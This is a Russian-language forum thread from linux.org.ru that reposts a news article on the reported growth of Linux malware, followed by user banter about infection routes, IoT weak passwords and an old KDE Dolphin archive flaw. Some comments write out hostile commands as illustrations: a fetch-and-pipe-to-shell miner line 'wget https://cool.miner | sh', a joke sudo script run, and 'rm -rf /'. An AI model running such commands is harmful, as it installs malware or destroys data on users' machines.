LINUX.ORG.RU
ФорумTalks

Стала хуже Windows. Linux - рекордсмен по росту числа вирусов и троянов

 , ,


1

1

За первые полгода 2022 г. количество вредоносов под Linux выросло на 646%. Это абсолютный рекорд среди ОС – даже Windows осталась позади. Атаки на Linux-системы выгодны хакерам, поскольку на них работают облака, а также устройства интернета вещей, которые можно «зомбировать» и подключить к ботнет-сети.

Операционные системы на базе Linux в совокупности заняли первое место по темпам прироста написанного специально под них вредоносного софта. По данным сервиса Atlas VPN, всего за год, с первой половины 2021 г., число малварей под Linux подскочило на 646%.

Если годом ранее видов и модификаций такого рода ПО было в пределах 226,3 тыс., то теперь уже почти 1,69 млн. Но это не единственный антирекорд Linux – в период с 1 января по 30 июня 2022 г. в мире появилось больше вредоносных программ под эту систему, чем за весь 2021 г.

Фактически, Linux остался единственной ОС из наиболее распространенных, для которой зафиксирован именно прирост числа малварей. В случае Windows и Android, а также macOS эксперты Atlas VPN в первой половине 2022 г. наблюдали обратный процесс.

Суть кроется в сферах использования Linux. На пользовательских устройствах его дистрибутивы встречаются крайне редко – 2,75% против 14,49 у macOS и 75,28% у Windows. Зато именно Linux является основой подавляющего большинства современных популярных облачных сервисов, что уже делает его более привлекательным в глазах хакеров.

Кроме того, на Linux работают и многочисленные устройства интернета вещей. Их взлом открывает киберпреступникам широчайший простор для «творчества». Например, они могут получить доступ к устройствам умного дома и устроить слежку за их владельцем или просто подключить их к своим ботнет-сетям. Также Linux работает на внутренних системах многих сетей, что делает атаки устройства под управлением этих ОС очень прибыльными.

Продемонстрировав колоссальный прирост числа малварей, Linux лишь незначительно приблизился по их абсолютному количеству к Windows. Если вредоносов для Linux насчитывается в пределах 1,7 млн, то для Windows их в десятки раз больше – 41,4 млн.

Вероятнее всего, системы Microsoft лидируют в данном рейтинге лишь благодаря своему широкому распространению. Она установлена на большинстве компьютеров мира, где хакерам всегда есть, чем поживиться. Это могут быть например, персональные данные или информация, представляющая коммерческую тайну. А вирус-шифровальщик, успешно подсаженный в сеть какой-нибудь компании, может принести хакеру солидный доход в виде выкупа в обмен на дешифратор.

Однако впечатляющая скорость появления новых вирусов и троянов под Linux может означать, что в относительно скором будущем Linux если и не догонит Windows, то приблизился к ней вплотную. Эксперты Atlas VPN выпустили ряд рекомендаций для пользователей и администраторов систем на Linux, которые позволят снизить риск заражения ПК или сети вредоносом.

Они заключаются в регулярном обновлении своих устройств, включая апдейты для антивирусов и самой ОС, в том числе исправления для систем безопасности. Также в рекомендациях упомянуто использование программ для шифрования особенно ценной информации, чтобы даже в случае заражения она не досталась злоумышленникам.

Количество атак тоже растет По мере роста интереса киберпреступников к устройствам на Linux увеличивается не только число малварей под него, но и количество совершаемых атак. Как сообщал CNews, по итогам 2021 г. число заражений Linux-устройств вредоносным ПО в сумме выросло на 35% в сравнении с 2020 г.

Основной удар приняли на себя устройства интернета вещей. Их взломать проще всего, поскольку на них, как правило, установлены, урезанные версии Linux, а их владельцы не особо стремятся регулярно обновлять ПО для них. Да и многие производители выпускают апдейты безопасности слишком редко, в результате чего устройства интернета вещей рано или поздно становятся частью крупных ботнет-сетей.

Наиболее востребованными среди хакеров семействами вредоносов под Linux оказались XorDDoS, Mirai и Mozi. Согласно отчету Crowdstrike, по итогам 2021 г. на них пришлось около 22% всех зафиксированных атак на Linux-системы. Рекордсменом в этом плане стало семейство Mozi. Всего за год его активность выросла в 10 раз. Mozi представляет собой одноранговую (P2P) ботнет-сеть, в которой используется система распределенной хеш-таблицы (DHT), реализующая собственный расширенный DHT.

https://safe.cnews.ru/news/top/2022-08-03_huzhe_windowslinux_stal_rekordsmenom

Не осилил дочитать, желтая краска вытекающая их моника закончилась.
Вы не проснувшимся чтоли копистнули эту ерунду сюда?

anc ★★★★★
()
Ответ на: комментарий от gremlin_the_red

Вот поистине годное решение!

anc ★★★★★
()
Ответ на: комментарий от Spoofing

нет. оставляют данные куда перечислить денег если вирь не заработет, дабы они его для вас починили.

anc ★★★★★
()

Ожидаемо. Андроид когда стала популярной и к ней стали писать вирусы.
[UPD:]

Если годом ранее видов и модификаций такого рода ПО было в пределах 226,3 тыс., то теперь уже почти 1,69 млн.

Какая-то херь...

xwicked ★★☆
()
Последнее исправление: xwicked (всего исправлений: 2)

а как их словить? с виндой все пронятно - в воровоаные программы зашито… а с линуксом как? ведь там все из репы.

amd_amd ★★★★★
()
Ответ на: комментарий от amd_amd

four star... четыре звезды черт возьми! и все ещё не знаете как собрать вирю? мельчает лор, ох мельчает...

anc ★★★★★
()
Ответ на: комментарий от amd_amd

а как их словить? с виндой все пронятно - в воровоаные программы зашито… а с линуксом как? ведь там все из репы.

Если я правильно понял, что малварь, то это обычная следилка, которая работает от обычного пользователя, хотя нужно дочитать новость и узнать что-такое малварь.

xwicked ★★☆
()
Ответ на: комментарий от xwicked

Linux - рекордсмен по росту числа вирусов и троянов

дочитать новость

зачем? из названия все понятно.

amd_amd ★★★★★
()
Ответ на: комментарий от amd_amd

как его из репы зацепить?

Вот точно «и выросло поколение»....

anc ★★★★★
()
Ответ на: комментарий от Neresar

Не уверен что хоть где-нибудь есть больше дырок чем в линуксе. Ты же понимаешь, что модель контрибутинга в линукс есть кромешный ад и хаос. Всякие GSoCи и прочие интерны гугла коммитят в линукс пока ты спишь не имея ни малейшего представления о том что делают.

Не отрицаю наличия дыр в бздях, но тут эффект неуловимого джо играет свою роль.

untitl3d
()
Последнее исправление: untitl3d (всего исправлений: 1)
Ответ на: комментарий от amd_amd

Подключаешь репу с вирусом, делаешь update && install virus-package. Стыдно такое не уметь.

agentgoblin
()
Ответ на: комментарий от untitl3d

Грусть и тоска заполняют сердце моё, неужели мы обречены?в чем душа наша обретёт покой?В ЯОС на Активном Обероне?

Neresar ★★
()
Ответ на: комментарий от untitl3d

Не уверен что хоть где-нибудь есть больше дырок чем в линуксе.

дяденька, а вы офтопик ковыряли? если нет то рекомендую....

anc ★★★★★
()

Короче перевод - понаплывшие «вайтивайти через иоти» понаделали говна с хардкожеными паролями и забивают на апдейты - вы купили наше говно и теперь это ваша проблема, хомячки с комплексом бога и недотраха ставят пароли «бог» «секс» и «heilukraine» и тоже забивают на апдейты (если на них не забили ранее «разработчики») и теперь стараниями этих идиотов иотговно стало чашкой петри для всякой малвари

no-dashi-v2 ★★★
()
Последнее исправление: no-dashi-v2 (всего исправлений: 1)
Ответ на: комментарий от xwicked

заражающий роутеры на чипах BroadCom

объясни механизм? вот у меня такой роутер - прошивка стоковая, сижу за натом то есть входная витая пара подключена в порт wan… как при таком раскладе можно атаковать роутер да к тому же заразить его?

amd_amd ★★★★★
()

Cnews это ж мелкософтовская пропаганда, кто-то ещё не знает об этом?

cobold ★★★★★
()
Ответ на: комментарий от amd_amd

объясни механизм?

Это можно было бы спросить у покойного Криса Касперски, но не у меня. На крайняк напиши в ту исследовательскую раболаторию, пущай ответ держут...

xwicked ★★☆
()

Вернитесь с новостями, когда для их запуска не понадобится китайская IoT поделка или самостоятельная установка от рута.

/0

erfea ★★★★★
()
Ответ на: комментарий от amd_amd

как ею заразить?

Через уязвимость. Например, если ты пользуешься старым дистром с KDE, я могу заразить тебя обычным архивом любого формата:

OrBit - очередной зловред для линукса. Говорят, идёт волна зловредов. (комментарий)

Далее через дырявые иксы получаю твой ввод, фильтрую его на пароли к сайту поней с кошачьими ушками и т. д.

EXL ★★★★★
()
Последнее исправление: EXL (всего исправлений: 1)
Ответ на: комментарий от amd_amd

в воровоаные программы зашито

Товарищ, на фоне грядущего распуска экстремистских организаций «ВТО» и «ВИПО» бездумное педалирование ихней ядовитой пропаганды становится ещё более зашкварным.

Пираты на морях, воры в клептокапчер.

token_polyak ★★★★★
()
Последнее исправление: token_polyak (всего исправлений: 1)

Интернет овощей в опасности. Все на KasperskyOS.

qaqa ★★
()
Ответ на: комментарий от amd_amd

а как их словить?

Пользоваться уязвимым ролтером, тв-боксом и прочими мыльницами, видевшими обновления в прошлом десятилетии.

Suigintou ★★★★★
()

Хакеры: написали 6 с половиной новых вирусов под линукс

ОП: За первые полгода 2022 г. количество вредоносов под Linux выросло на 646%

goingUp ★★★★★
()
Последнее исправление: goingUp (всего исправлений: 1)
Ответ на: комментарий от untitl3d

Дело не в Джо, а в размере кодовой базы.
Количество ошибок на 1000 loc в bsd & Linux +- одинаковое, а вот в размере кодовой базы разница на порядки.
Естественно дыр в линуксе будет больше.

Minona ★★☆
()
Ответ на: комментарий от hakavlad

wget wishmaster.py

sudo python3 wishmaster.py

это инструкция как заразить? так понимаю я сам эти команды вести должен? да еще из под sudo - то есть пароль нужен… так зачем тогда что то качать? сразу водить # rm -rf / и готово дело - типа вирусы систему пожрали.

amd_amd ★★★★★
()
Ответ на: комментарий от EXL

ты пользуешься старым дистром с KDE

я пользуюсь sid-ом c jwm

могу заразить тебя обычным архивом любого формата

как? ну предположим я в mc клацнул по архиву… дальше то что?

amd_amd ★★★★★
()
Ответ на: комментарий от Suigintou

уязвимым ролтером

в чем заключается эта уязвимость? как атаковать роутер через витую пару воткнутую в wan?

видевшими обновления в прошлом десятилетии

самый старый asus 2007 года так он обновлений вообще не видел

amd_amd ★★★★★
()
Ответ на: комментарий от amd_amd

как? ну предположим я в mc клацнул по архиву… дальше то что?

Речь идёт про файловый менеджер Dolphin из KDE. Там с начала времён до 2019 года была серьёзная уязвимость, благодаря которой если ты клацал по специально подготовленному архиву – то выполнялся произвольный код из него, в который никто тебе не мешал засунуть что-то вроде: wget https://cool.miner | sh, запустить через это программу-кейлоггер с отправкой данных и SSH-ключей на удалёный сервер и т. д.

Подобное заражение выполняется через уязвимости. И нет абсолютно никаких гарантий что в mc, в котором ты клацаешь архивы каждый день, этих уязвимостей нет.

EXL ★★★★★
()

За первые полгода 2022 г. количество вредоносов под Linux выросло на 646%.

Где их всех скачать то, как скомпилировать и установить? Я конечно майнер на линукс словил разок, но это из за пароля на ссх вместо ключа.

Основной удар приняли на себя устройства интернета вещей. Их взломать проще всего, поскольку на них, как правило, установлены, урезанные версии Linux, а их владельцы не особо стремятся регулярно обновлять ПО для них.

Типа логин пароль admin:admin на этих устройствах это тоже дыра линукса?

А так, без полуюмора, под линуксы очень просто писать всякую херню, да системе может навредить не получится, а вот поманипулировать с данными в ~/home/$USER легко, а это ведь самое важное если делао касается как минимум домашних компуктеров.

А то что новочки воообщзе без задней мысли качают себе из интерента всё подряд и запускают все подряд команды после копипасты отовсюду то не мудрено.

LINUX-ORG-RU ★★★★★
()
Последнее исправление: LINUX-ORG-RU (всего исправлений: 1)
Ответ на: комментарий от EXL

по специально подготовленному архиву

типа после разархивирования автоматом запускаются исполняемые файлы которые в нем содержались? что то вроде за архивированых скриптов содержащих вредоносный код? но как все это получало доступ в системные дирректории? или оно чисто из хомяка работало?

amd_amd ★★★★★
()
Ответ на: комментарий от amd_amd

Лет 10-15 назад столкнулся с новым супер-пупер днолинком. Если к нему было подключие по Wi-Fi или LAN, то получение админки не составляло проблем. Для этого нужно было скачать подготовленную страницу HTML, в ней изменить адрес роутера, открыть в браузере и вуаля - полный доступ к админки роутера без пароля администратора. Подробности за давностью лет уже не помню, но было как-то так.

sagittarius
()
Ответ на: комментарий от amd_amd

что то вроде за архивированых скриптов содержащих вредоносный код? но как все это получало доступ в системные дирректории? или оно чисто из хомяка работало?

Да. Linux-дистрибутивы от вирусов спасает лишь их низкая популярность. Доступ в системные директории организуется через другие уязвимости, но в частном случае он не нужен вообще, ибо для запуска майнера или слива SSH-ключей, достаточно лишь подобной уязвимости что была в KDE и Dolphin.

EXL ★★★★★
()

Рост от какой базы, вот что важно. Одно дело падение с 1000 малварей в год, до 900. Другое дело рост с 10, до 60.

shpinog ★★★★
()
Ответ на: комментарий от vbr

от рута

через su, но такое происходит только когда чрутюсь или передаю на ходу параметры ядру, а так в основном sudo sudo apt update\upgrade\install по моему все безопасно дальше некуда.

amd_amd ★★★★★
()
Ответ на: комментарий от utanho

Неа, я именно про разовые обращения.

anc ★★★★★
()
Ответ на: комментарий от amd_amd

Ну вот когда ты набираешь su или sudo, тут-то вирус и рута получит. У su и sudo безопасность нулевая. Исключительно защита от дурака, чтобы случайно опасную команду не выполнить.

vbr ★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.